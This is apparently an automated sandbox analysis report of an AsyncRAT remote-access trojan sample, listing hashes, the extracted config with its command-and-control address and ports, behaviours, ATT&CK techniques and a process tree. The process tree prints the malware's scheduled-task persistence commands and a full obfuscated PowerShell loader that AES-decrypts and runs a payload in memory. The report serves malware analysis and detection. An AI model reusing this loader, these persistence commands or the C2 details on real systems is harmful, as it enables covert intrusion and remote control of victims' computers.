asyncrat | b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7

General

Target

iFYEJ.exe
Size

2.5MB
MD5

acfe53c70928d44f9cf498495145ec84
SHA1

2a12b327d4e5628904cc25c5f134732d6265e662
SHA256

b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7
SHA512

345143bcc9895282d2843efee182eb07bc0d0179c0c1e6ffcdd7ff9f1d44c252ffccb1b56c2b48c70b554f3427f6a1c23a6ea6b1c9e76edcbe655e88e247741c
SSDEEP

49152:Gg8nNv+SzYW4ZOUB5hempuE8OOTRmgysj8k4:Gg8h14

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

89.117.21.143:6606

89.117.21.143:7707

89.117.21.143:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4372-137-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

Processes:

mubnxc.bat.exe

pid process

4760 mubnxc.bat.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

45 api.ipify.org
46 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

iFYEJ.exe

description pid process target process

PID 4848 set thread context of 4372 4848 iFYEJ.exe vbc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4888 schtasks.exe
4152 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1832 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exemubnxc.bat.exe

pid process

4660 powershell.exe
4660 powershell.exe
4760 mubnxc.bat.exe
4760 mubnxc.bat.exe

pid	process
4760	mubnxc.bat.exe

flow	ioc
45	api.ipify.org
46	api.ipify.org

description	pid	process	target process
PID 4848 set thread context of 4372	4848	iFYEJ.exe	vbc.exe

pid	process
4888	schtasks.exe
4152	schtasks.exe

pid	process
1832	timeout.exe

pid	process
4660	powershell.exe
4660	powershell.exe
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

iFYEJ.exevbc.exepowershell.exemubnxc.bat.exe

description	pid	process
Token: SeDebugPrivilege	4848	iFYEJ.exe
Token: SeDebugPrivilege	4372	vbc.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4760	mubnxc.bat.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

mubnxc.bat.exe

pid process

4760 mubnxc.bat.exe
4760 mubnxc.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

mubnxc.bat.exe

pid process

4760 mubnxc.bat.exe
4760 mubnxc.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

mubnxc.bat.exe

pid process

4760 mubnxc.bat.exe

pid	process
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

pid	process
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

pid	process
4760	mubnxc.bat.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

iFYEJ.execmd.exevbc.execmd.execmd.exepowershell.execmd.exemubnxc.bat.exe

description	pid	process	target process
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	cmd.exe
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	cmd.exe
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	cmd.exe
PID 364 wrote to memory of 4888	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 4888	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 4888	364	cmd.exe	schtasks.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	vbc.exe
PID 4372 wrote to memory of 1168	4372	vbc.exe	cmd.exe
PID 4372 wrote to memory of 1168	4372	vbc.exe	cmd.exe
PID 4372 wrote to memory of 1168	4372	vbc.exe	cmd.exe
PID 4372 wrote to memory of 5000	4372	vbc.exe	cmd.exe
PID 4372 wrote to memory of 5000	4372	vbc.exe	cmd.exe
PID 4372 wrote to memory of 5000	4372	vbc.exe	cmd.exe
PID 1168 wrote to memory of 4660	1168	cmd.exe	powershell.exe
PID 1168 wrote to memory of 4660	1168	cmd.exe	powershell.exe
PID 1168 wrote to memory of 4660	1168	cmd.exe	powershell.exe
PID 5000 wrote to memory of 1832	5000	cmd.exe	timeout.exe
PID 5000 wrote to memory of 1832	5000	cmd.exe	timeout.exe
PID 5000 wrote to memory of 1832	5000	cmd.exe	timeout.exe
PID 4660 wrote to memory of 4180	4660	powershell.exe	cmd.exe
PID 4660 wrote to memory of 4180	4660	powershell.exe	cmd.exe
PID 4660 wrote to memory of 4180	4660	powershell.exe	cmd.exe
PID 4180 wrote to memory of 4760	4180	cmd.exe	mubnxc.bat.exe
PID 4180 wrote to memory of 4760	4180	cmd.exe	mubnxc.bat.exe
PID 4180 wrote to memory of 4760	4180	cmd.exe	mubnxc.bat.exe
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	schtasks.exe
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	schtasks.exe
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe
"C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
3⤵
- Creates scheduled task(s)
PID:4888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mubnxc.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mubnxc.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mubnxc.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4180

C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe
"mubnxc.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $jwaHO = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mubnxc.bat').Split([Environment]::NewLine);foreach ($eKGSM in $jwaHO) { if ($eKGSM.StartsWith(':: ')) { $qdqSr = $eKGSM.Substring(3); break; }; };$QQCgF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qdqSr);$AmjNH = New-Object System.Security.Cryptography.AesManaged;$AmjNH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AmjNH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AmjNH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h2/C7kSVdBKzfHpNijDOerbgICwzq39ikAsdwwbv4us=');$AmjNH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7g2z5diB2473fR8+2MRCTQ==');$wgvzs = $AmjNH.CreateDecryptor();$QQCgF = $wgvzs.TransformFinalBlock($QQCgF, 0, $QQCgF.Length);$wgvzs.Dispose();$AmjNH.Dispose();$tkbaD = New-Object System.IO.MemoryStream(, $QQCgF);$TZnYn = New-Object System.IO.MemoryStream;$FtxeR = New-Object System.IO.Compression.GZipStream($tkbaD, [IO.Compression.CompressionMode]::Decompress);$FtxeR.CopyTo($TZnYn);$FtxeR.Dispose();$tkbaD.Dispose();$TZnYn.Dispose();$QQCgF = $TZnYn.ToArray();$IqKDG = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QQCgF);$vjmLt = $IqKDG.EntryPoint;$vjmLt.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4760

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp16C4.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\SysWOW64\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:1832

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
912064d07dcffff0a99c28aa6754fbdd

SHA1
8f8baabad55b5f241891aa604dda7dcb891f716e

SHA256
f5de8ec60e46102bbb009d161f8b30c4ed4847d057e390109b22344f27241017

SHA512
57886b175183f88b58b20d93945342564d2d5cb5b77cd122c9d6fdb54aa04f353c4cbffc711bcd9823ad189d41ec727e054e8a127398400f53a0ea5018166001

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat
Filesize
325KB

MD5
0e901cd4460579b61abece2b88f54035

SHA1
e776e751a2257cc6d56b85dd7f3c5c1a64bfc604

SHA256
59fbf83208e965445268cc973a63516dba60c68eced0d3cd8ed2e9499951dc32

SHA512
f15cbd6d506142f0c1f3f5271881c4e083d08976f34d18b72d4967efe33f4479acf3d3f3b5d9ea537f110be407a72c968204494428e1f0626ffe10bdc3df4a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp16C4.tmp.bat
Filesize
167B

MD5
20e9730e536254e85365f045ef95825e

SHA1
9f5b3903b6efb80b07c481a1759cbd3aceabfc06

SHA256
41dfacf84349ff5a374a75ff0db57145b6001f543f3bda8342633448577a37b8

SHA512
8ae79e410dac21b62361e6994e7520c29c7b82c345aee4553284f019331416177fdd42e8a487a60c60114f7fc89d133b02033d28b22a218510630d7eebe0d3d6

Download Submit
memory/364-134-0x0000000000000000-mapping.dmp

Download
memory/1168-142-0x0000000000000000-mapping.dmp

Download
memory/1832-146-0x0000000000000000-mapping.dmp

Download
memory/4152-164-0x0000000000000000-mapping.dmp

Download
memory/4180-156-0x0000000000000000-mapping.dmp

Download
memory/4372-141-0x00000000072A0000-0x00000000072BE000-memory.dmp

Filesize
120KB

Download
memory/4372-139-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/4372-136-0x0000000000000000-mapping.dmp

Download
memory/4372-137-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4372-140-0x00000000071D0000-0x0000000007246000-memory.dmp

Filesize
472KB

Download
memory/4372-138-0x00000000061D0000-0x000000000626C000-memory.dmp

Filesize
624KB

Download
memory/4660-149-0x0000000005DF0000-0x0000000005E12000-memory.dmp

Filesize
136KB

Download
memory/4660-144-0x0000000000000000-mapping.dmp

Download
memory/4660-150-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/4660-151-0x0000000006590000-0x00000000065AE000-memory.dmp

Filesize
120KB

Download
memory/4660-152-0x00000000076E0000-0x0000000007776000-memory.dmp

Filesize
600KB

Download
memory/4660-153-0x0000000006A60000-0x0000000006A7A000-memory.dmp

Filesize
104KB

Download
memory/4660-154-0x0000000006AB0000-0x0000000006AD2000-memory.dmp

Filesize
136KB

Download
memory/4660-148-0x0000000005690000-0x0000000005CB8000-memory.dmp

Filesize
6.2MB

Download
memory/4660-147-0x0000000004F90000-0x0000000004FC6000-memory.dmp

Filesize
216KB

Download
memory/4760-157-0x0000000000000000-mapping.dmp

Download
memory/4760-160-0x00000000071D0000-0x000000000784A000-memory.dmp

Filesize
6.5MB

Download
memory/4760-162-0x0000000006D90000-0x0000000006E22000-memory.dmp

Filesize
584KB

Download
memory/4760-163-0x0000000006D20000-0x0000000006D2A000-memory.dmp

Filesize
40KB

Download
memory/4760-165-0x0000000007120000-0x0000000007170000-memory.dmp

Filesize
320KB

Download
memory/4760-166-0x0000000007910000-0x00000000079C2000-memory.dmp

Filesize
712KB

Download
memory/4760-167-0x0000000007BA0000-0x0000000007D62000-memory.dmp

Filesize
1.8MB

Download
memory/4760-168-0x00000000089D0000-0x0000000008FE8000-memory.dmp

Filesize
6.1MB

Download
memory/4848-132-0x0000000000490000-0x0000000000718000-memory.dmp

Filesize
2.5MB

Download
memory/4848-133-0x0000000005860000-0x0000000005E04000-memory.dmp

Filesize
5.6MB

Download
memory/4888-135-0x0000000000000000-mapping.dmp

Download
memory/5000-143-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads